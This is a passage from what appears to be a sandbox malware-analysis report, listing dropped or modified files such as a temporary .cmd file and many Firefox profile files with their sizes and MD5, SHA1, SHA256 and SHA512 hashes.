SHA5124802ef62630c521d83a1d333969593fb00c9b38f82b4d07f70fbd21f495fea9b3f67676064573d2c71c42bc6f701992989742213501b16087bb6110e337c7546
-
Filesize
78KB
MD5a37ee36b536409056a86f50e67777dd7
SHA11cafa159292aa736fc595fc04e16325b27cd6750
SHA2568934aaeb65b6e6d253dfe72dea5d65856bd871e989d5d3a2a35edfe867bb4825
SHA5123a7c260646315cf8c01f44b2ec60974017496bd0d80dd055c7e43b707cadba2d63aab5e0efd435670aa77886ed86368390d42c4017fc433c3c4b9d1c47d0f356
-
C:\Users\Admin\AppData\Local\Temp\{ff499140-fbb0-4a6a-8812-a68293f59bd9}\61a99688-3ceb-422b-89c3-50229b6b9c76.cmd
Filesize695B
MD5f4664a90bd29ecffa955e5169c9bd809
SHA1f55b625be0f8bd880b312277e3533a87bc9c8a4b
SHA256b4423ce6bfa5bdab25b49228e1312f2cf1d450363c10c573da10f49d51a5905e
SHA51239c797f58b5e586d2a5efa06fb1314b1a67a0397c916719a93dcadeaf73f739df53c6731a8066adf3048314a0d344ee787d2dc6c0f79ebc9307f6b66669e3547
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\AlternateServices.bin
Filesize8KB
MD5d4c4152776158687b787e3d6ca98b5e9
SHA1b7b87326a3997578a3357428b4075b8c5aef93ec
SHA256241b531babc1ce51ada3b61dfbe3d02f1adef0a851c75a32dfe6582a6aaf662c
SHA512d5e3bd342655aa41e5424560c2c1bc0b57659d066fe8ac2c4cf27aaa14c0af5ec37fe2538e00c8ff3f4cc95db19b00b2d1bdcbd961091d83a3dd54de5870f73a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\AlternateServices.bin
Filesize17KB
MD51c5cc058d22f05d9b860e2257aefe96a
SHA131fb251bf774c260e01bd8e1ba4b8f290a75eb1f
SHA256730a0379bf1ecc866f9266f4589c8cc6bbd6b32bfc5f3215296cff6588d5e890
SHA512980da3ade33d12514ec0773ee2b7da10d77dc1b0f7453d35a3f098e7d180bb8664a604527154e0114d4426f3f199c11b3376e4465f6bd31241cd060791e91006
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\SiteSecurityServiceState.bin
Filesize1KB
MD5d2cdeef018d238828f805d74331b7db3
SHA124cb58dc48b9445f69caf44c6de5785d9b4af11d
SHA256cdd85dcd980469401d1a25c712373d5c5743035bc4eb911349078ea4d3ea48db
SHA51209db2ae8562f93b187e381582683e11fd656471508b9fdeea41a3b2a7f303bdabe21ec3eb237faf9e580b8185f8d51bcec8ba516881f31bc8e902c46e4989c0f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\db\data.safe.tmp
Filesize7KB
MD56bcb525ccf99d795be4088db4e7d1f6e
SHA1efc47f1add4af2699c312b354fa0e42ab8025f88
SHA2560167d44a4f2594c348ea43b69e83785cd4788cb566453e9bb0bb315891fe8f84
SHA512c61930d48aa35e002990479c70028e06d1d8a3d006314f4f6813d81dceef4c65f4f9f059d108f62a5cc44c20874d598a4d7151a3bf6a39cf510fe7dcee5bd2d2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\db\data.safe.tmp
Filesize49KB
MD50ef87158f7a4d4f778c118630845dc66
SHA1e06f5c81a032ec9dcff4a782d0fc38b9a254590a
SHA256ba94557ae93f89d1aca71dd9443594e247b76519575135fd3e93b2fc0773c151
SHA51201193f8a854b0f94bb473200f03a252cb318d714aae360e91c68afc1f59211844309dfece9c800c200235adf27cda3fa1197447a2132734846a585a3260d7344
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\db\data.safe.tmp
Filesize49KB
MD56081c83245162206968058b2095ae4b2
SHA1f87ca811ff4629e92b86839a9d9645ac4a7b9430
SHA256b41e5ee2f7daec9ec0d1f17aa78d67b7a6d3c0c7473585f3c2fcffb26cbe6f8f
SHA5127fb2c12aaa1773b3136c4a7a971b128cad36b310e3d57af6e4405d6c564a54bd7643ca2c6bbacf52d9e57aec14a276f3e400126fa75c14794f692883f30714b5
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\db\data.safe.tmp
Filesize49KB
MD5a3366bca487389aa889bbe5f3ca01651
SHA1d7339f21803af7a14ca39d218ba568d4425de265
SHA256d7617160fddc3a552485a5bed17ce4fcae057c2ff198b78444baea9ceed9fe7d
SHA512a573397b06ece20d8888a94c9cf12d168732a24c1ff2137504bf6fe0ac4699c6ead0c00b20abe0871fa1986211f96fb6b7ac4f969b414e0ff3c5d46c92c14982
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\db\data.safe.tmp
Filesize49KB
MD55e32d282bc6c492616028e78124e23a3
SHA1f629be91119b438a0d61fe34edd6170b5fb4e293
SHA256f3f965a0228e842ff032f13205c82eb100cc53708bbe1245aa829f9a10c84616
SHA512360fbfce78004a8ce0143acb43f3629b46498f6d99b6ae9d78563af29862d1ece24e8a28607a1c6c766e52aef0c96e4a56cd680d3b762a3457379d535842f729
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD57ab8dd90242c32a7323c3df37c125881
SHA16e55bd72fa5bfe3612798641d111dea4573ae65e
SHA2569156d42005f07edba6afd7ccc504367e3bee8c3c89b664fc60fe0f1d4d836548
SHA51267269f58ee8b72806818481676f65f40ea23116204a4571f0c26cf89f2eae44c71abc01fc8fed80dc69dab7162804d71bb783ec9672b7a9e565add386a2a5975
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\events\events
Filesize1KB
MD5cb8ec9873186a328193b46cfa2d58e92
SHA1df782ada7d10f0b31e183a8f8484d2c4f2bef1ee
SHA256f548b59073f5063d4ff2fd8dea423160af2f4080ffa9fef77ae9e6ed80e91cef
SHA512aaa5a91d0eeb525e73a4d2f8836727e7f1ddc94e3bf9547839e9449349465f149c63e7ac6af2ed126c7b6bb68a3f44dec2939fe8f26b1e7d438df26ddf4d29ab
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\pending_pings\28656ac7-d6eb-4156-8c17-f4013db62443
Filesize16KB
MD543a71c15bdb35a7d5f087fce0b9e9715
SHA157bf3384490b764cea4b544333074c68c9d7ae6e
SHA2565dea3670445f73add603bc76f979ab344b349541409193670230b7b5b6ed84b0
SHA5124c39c7362653532c94c87de67598d39495f02f3b99e4808695d4df04d9526de90eacfa43274711ca4f43264f6b46e084bfdba875c077413d82ec600167dfcb0e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\pending_pings\693ea712-f511-4864-83d6-5d001f3fd358
Filesize883B
MD5b31a843c8e36097d26274bf022d9f23a
SHA1f237c73761e906a8e355a5633d5f94bf53096af9
SHA256c15fb16093476d2795fc5bdca8099912e9150be0231264b20a3f7c5b9f849139
SHA51208b605d8ccb9df0fadc50d7b5febcd92c292a486527324c3ea7a0a6cb39db404db28cc4eed9b3c91c8ae9ce2d36c6ce0ce5cef4be0fd2dd1a878d038a86c0e51
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\pending_pings\77ceb980-50a2-454e-9dcc-3f07c796ced5
Filesize235B
MD552f7c1997dc692cda399348138299317
SHA1699a6b839b08cb37846bf76416b8d44f142f82f3
SHA25685853bd06e2b3d93d43a48c69e3fca765ac26683fe3aa1e20aeec24744e1d169
SHA512abd1d750af61399ee7a05c32a78b1d18382486020a4d9d2c7cfc60128465d746848a62809449983fc757a1df60b313afb052f6b49190aac574c44a182309ffdf
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\pending_pings\9aa17b84-e416-4bf4-ad47-b67bd4a62c2d
Filesize235B
MD57a5f1c420e1fa5adcc2fdf408942287b
SHA12f0947536a59a4f506cbab13bf7fb2c2c0a526ec
SHA256e3284cd68b70678e209912e3da223e6041db9f62969902448e60691d219b4698
SHA51209897f7fa388592408bacca8381a0a53fb8b3bf18b1a7b6f37231a53f01da8debe577051014ab0b983f362f45f9caa428e6a13c85b81392ace1f0212e101780f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\pending_pings\a137e195-66b0-4193-b590-de59a3c1704a
Filesize2KB
MD5a4a0a451949500683219c52239cbef1f
SHA1d012ff0930665c6c31533e48beb647c96ace0506
SHA256f2a880bbcc6db8e3f94d3bbb4446031aefd797eda6386ce8be0ccb0722ff1fdf
SHA5120b789ab8946494b803fd3145f411e4cd1828d01ba80434b3e20d4e4b44c32eb99f17d812534f0f3ad900d7a4566c43fc19b194afc297eace4ca75fda72e6a152
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\pending_pings\a606604f-da2d-4e31-8d04-fd437e797101
Filesize886B
MD5388ae041f90b3af4bc4557e4ac9a3e5e
SHA1c7cdf76a44c97b3f36e4c12179c8d0a5aca2c4ec
SHA256ff3ef27e50104b8629bbf20d6d2eb9e4c547f005a69909ac47a211a6531c4c42
SHA512c001971d5e505acaf4823a0cc31773a3a48916d9e802915bc36889db23c99025dd43d4716ff4d069bbcd3452a802782de08facb47e5b76dbf6642b8b9b3a5c40
-
Filesize
16KB
MD5254943f025f29c98c1b14e34fe2a8f62
SHA1db98d1b1efa6135e86f46b9a7228b8e1f1a079d7
SHA25640079210924f54eebfbf1d7ead4c42d6a75cc2311791bfab7da7a47fe7711bb6
SHA5120ffa8f5ebd8e2dcf4551fd5d9045802313eee6168afe1a5665d6a8965b1ac2f83d1ab03d4890a74935eb83772fdf91d2fd9d71a6f2161a38c31ba93051c3c8cc
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.dll
Filesize965KB
MD5f7c1b3eaee11b0a498998b485782aebe
SHA1786f7091a2a2551117adac032f2622c815e14c06
SHA25684a9cc998bc517598a90ccd02a104cb9eb2bbd2feed56de83fc8c2a11c033b76
SHA512f30d3b320ca9f86a4dcebf9cd210f133147c66105fdaa4a6661eee50b4269b262411772f2b6a4823b4feff1398e2f5e5fc68c7f7a72621e71b6ef693160b4731
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.info
Filesize116B
MD5ae29912407dfadf0d683982d4fb57293
SHA10542053f5a6ce07dc206f69230109be4a5e25775
SHA256fe7686a6281f0ab519c32c788ce0da0d01640425018dcffcfcb81105757f6fe6
SHA5126f9083152c02f93a900cb69b1ce879e0c0d69453f1046280ca549a0301ae7925facdda6329f7ccb61726addee78ba2fffc5ba3491a185f139f3155716caf0a8d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\gmp-widevinecdm\4.10.2891.0\LICENSE.tmp
Filesize473B
MD5f6719687bed7403612eaed0b191eb4a9
SHA1dd03919750e45507743bd089a659e8efcefa7af1
SHA256afb514e4269594234b32c873ba2cd3cc8892e836861137b531a40a1232820c59
SHA512dd14a7eae05d90f35a055a5098d09cd2233d784f6ac228b5927925241689bff828e573b7a90a5196bfdd7aaeecf00f5c94486ad9e3910cfb07475fcfbb7f0d56
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\gmp-widevinecdm\4.10.2891.0\manifest.json
Filesize1001B
MD532aeacedce82bafbcba8d1ade9e88d5a
SHA1a9b4858d2ae0b6595705634fd024f7e076426a24
SHA2564ed3c6389f6f7cd94db5cd0f870c34a296fc0de3b1e707fccf01645b455790ce
SHA51267dfe5632188714ec87f3c79dbe217a0ae4dfb784f3fac63affd20fef8b8ef1978c28b3bf7955f3daaf3004ac5316b1ffa964683b0676841bab4274c325c6e2b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\gmp-widevinecdm\4.10.2891.0\widevinecdm.dll
Filesize611KB
MD56638247d43a12e78ea48136372e09448
SHA1aa39da65642c7a7ebd7045a9a9161139ac0d93bd
SHA256228c05ec379c7ea906d3476b0a24b52e73aa3b3cc433930e59c59ea3b9fd18ce
SHA51207a24fe2ff66b2cf5d1fe3b611fd5c0df88c4d3e1e091867409e11bb0a5a2683987b56c279a384ce95d6f8fd8e00bbe4149e6baaef59f2f13f9ca0be8b3ebf84
-
Filesize
8KB
MD5f6001e7f340d3a82e952349dd406a0a2
SHA1e4417d042529d1901492c9541e1d4cde13db52cf
SHA25632bfe1abd36f80057fc1ca8225bd8d4572b0c1129fd72abfc97911ad918f57b5
SHA512c02316e5dde4c0323980a56828dc85478091cedad74334a457e82d53cf7b2f5e8ee852d739b74b129ae13a9396f1533849fc4a55f15c99139ec008dd4513532f
-
Filesize
6KB
MD5147d6ca5aae4aad10bc2b8d751e5db67
SHA194f69105b6e6b224e78a271ac0bde5df659dff2c
SHA256ce1856ec3b0b846529621aa327a7478999909e7763cc8974c33ef1fc8bd334e3
SHA512f29ec64d0b01a6a1792d7b0e330cd635bf1303ad8539528a09aef236b83d3cbc6a77efaa5373d50ac085dbad4042866de38a0bb80a4f6ac1e8fe05192ede5ab6
-
Filesize
6KB
MD5552c1f7ac8a686ff929179f2d6419ba0
SHA15f95159f93a86f8204bcd696578ca7d7cea3741d
SHA256bf24ffbdd9597ad60b9b25f13dae3dee021ccc2c2029d8d214edae1fc4490f0a
SHA512eac1c4e5cdc0d2624e1f907fba6361880ee68e2a596db061c8812908aba9341a4f3cffdfced40714ca3d2da491bb37623fcaef75ab744477d71e80730e928bbb
-
Filesize
6KB
MD529833a1faedaf7e55d3f2f41824e271d
SHA1d79a4e1276caaaa87174a8c9fe430d51f92c3619
SHA256607d81ca789b0432d00fb5c7d47ff3dbb868bdc4935de36bd9cb0c67c8c12189
SHA512d6f08ed76e7f102434dc4d2130bd4101049964cabfcebea638cbf0b10b0dd89f489f114bef36d117823106ad69f0c81dc12135f5ceccdd0ffaf903a9d9d56bc4
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\sessionstore-backups\recovery.jsonlz4
Filesize1KB
MD55c2872913c40687e693870226daf2172
SHA15443f35b892fc70d990d6f70cbda17ca8f72100f
SHA2567c142c1526bd2c13010f118b4f0cfb46fb29be09c341bb86d01da581d5da0b3b
SHA5128d20f895df75c1141e4e8f01c1bc62a11432e501bc5ebb03765f68c103497039a0b0bad455591b99c6c456d53ef440b0c761e5ca2ee94274890840e408941729
-
Filesize
355KB
MD59cfe1ced0752035a26677843c0cbb4e3
SHA1e8833ac499b41beb6763a684ba60333cdf955918
SHA2563bdb393dfaa63b9650658d9288a1dc9a62acc0d44c2f5eab9170485356b9b634
SHA51229e912e7e19f5ca984fb36fc38df87ed9f8eaa1b62fd0c21d75cbc7b7f16a441de3a97c40a813a8989953ff7c4045d6173066be2a6e6140c90325546b3d0773c
-
Filesize
199KB
MD5424b93cb92e15e3f41e3dd01a6a8e9cc
SHA12897ab04f69a92218bfac78f085456f98a18bdd3
SHA256ccb99a2eeb80cd74cc58691e7af7fce3264b941aea3d777d9e4a950b9e70b82e
SHA51215e984a761d873eef0ab50f8292fbba771208ff97a57b131441666c6628936c29f8b1f0e04ef8e880f33ef6fccebd20db882997ca3504c9e5ea1db781b9ffb0f
-
Filesize
260KB
MD566522d67917b7994ddfb5647f1c3472e
SHA1f341b9b28ca7ac21740d4a7d20e4477dba451139
SHA2565da15bcd1ad66b56b73994a073e8f0ff4170b9ed09c575ca1b046a59a01cc8a1
SHA512921babab093c5bd1e0ec1615c8842081b402a491ecc744613929fa5fafde628cd9bcc1b38b70024a8fa4317aea0b0dce71cd19f44103e50d6ed7a8d9e2a55968